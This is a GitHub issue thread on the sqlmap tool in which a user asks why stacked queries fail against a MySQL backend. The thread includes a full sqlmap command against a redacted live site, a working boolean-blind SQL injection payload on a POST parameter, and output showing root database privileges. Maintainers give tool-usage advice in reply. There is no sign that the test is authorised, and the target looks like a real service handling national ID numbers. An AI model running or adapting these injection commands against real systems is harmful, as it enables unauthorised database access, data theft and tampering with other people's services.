New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
About stacked queries #619
Comments
I think that it is not a stacked queries, try run sqlmap again with switch --technique=sq Also note what Regards to Venesuela ))) |
You rarely see stacked queries if DBMS is not PostgreSQL or MsSQL. In your
|
Ohhh I understand, the problem is that I am root but can not do much, just to see the looks and it does not help me at all when it comes to safety testing, nor can I read files having the full patch disclousure. And greetings and thanks for remembering my country :) |
Hello, long time no come over here! Greetings first of all.
My question is .. why can not use stacked queries if I have all the permissions of user and database is mysql.
sqlmap -u "http://www.xxxxx.com/xxxx.php" --data="nacionalidad=E&cedula=111111111&Consultar=Consultar" -p cedula -v 6 --dbms=Mysql --risk=5 --level=3 --sql-query="UPDATE TEST"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: POST
Parameter: cedula
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: nacionalidad=E&cedula=111111111' RLIKE (SELECT (CASE WHEN (9194=9194) THEN 111111111 ELSE 0x28 END)) AND 'uaRV'='uaRV&Consultar=Consultar
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
[01:38:30] [INFO] fetching current user
[01:38:30] [DEBUG] performed 0 queries in 0.00 seconds
current user: 'root@%'
[01:40:05] [INFO] fetching database users privileges
[01:40:05] [DEBUG] performed 0 queries in 0.01 seconds
database management system users privileges:
[*] 'root'@'%' (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
The text was updated successfully, but these errors were encountered: